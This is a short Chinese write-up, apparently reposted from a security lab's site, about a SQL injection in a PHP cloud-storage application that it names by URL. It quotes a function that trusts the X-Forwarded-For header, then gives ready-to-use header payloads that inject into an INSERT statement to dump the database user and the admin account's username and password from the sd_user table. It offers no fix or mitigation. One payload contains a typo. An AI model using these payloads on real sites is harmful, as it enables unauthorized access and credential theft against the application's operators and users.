官網:https://yun.aoaoao.me/
/includes/function.php 36-52 行
function get_real_ip(){
$ip=false;
if(!empty($_SERVER["HTTP_CLIENT_IP"])){
$ip = $_SERVER["HTTP_CLIENT_IP"];
}
if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ips = explode (", ", $_SERVER['HTTP_X_FORWARDED_FOR']);
if ($ip) { array_unshift($ips, $ip); $ip = FALSE; }
for ($i = 0; $i < count($ips); $i++) {
if (!eregi ("^(10|172\.16|192\.168)\.", $ips[$i])) {
$ip = $ips[$i];
break;
}
}
}
return ($ip ? $ip : $_SERVER['REMOTE_ADDR']);
}
獲取HTTP_X_FORWARDED_FOR
HTTP_X_FORWARDED_FOR是可以用戶自定義的
沒做什麼過濾 取出函數輸出一波
看到輸出就知道了一切(其實不看也知道)( ̄▽ ̄*)
全局查找get_real_ip() IP功能一般在用戶登陸 註冊 留言 這些是比較常見的
/includes/save.php 23-28 行
INSERT 注入原理我這裡就不講了
帶上 ming 參數 (post)
構造payload
X-Forwarded-For: 1.1.1.1',user(),'0',1,1); #
ming=123
爆用戶名: X-Forwarded-For: 1.1.1.1',(select username from sd_user where id=1),'0',uid,uid); #
爆密碼: X-Forwarded-For: 1.1.1.1',(select pwdfrom sd_user where id=1),'0',uid,uid); #
閱讀更多 合天網安實驗室 的文章
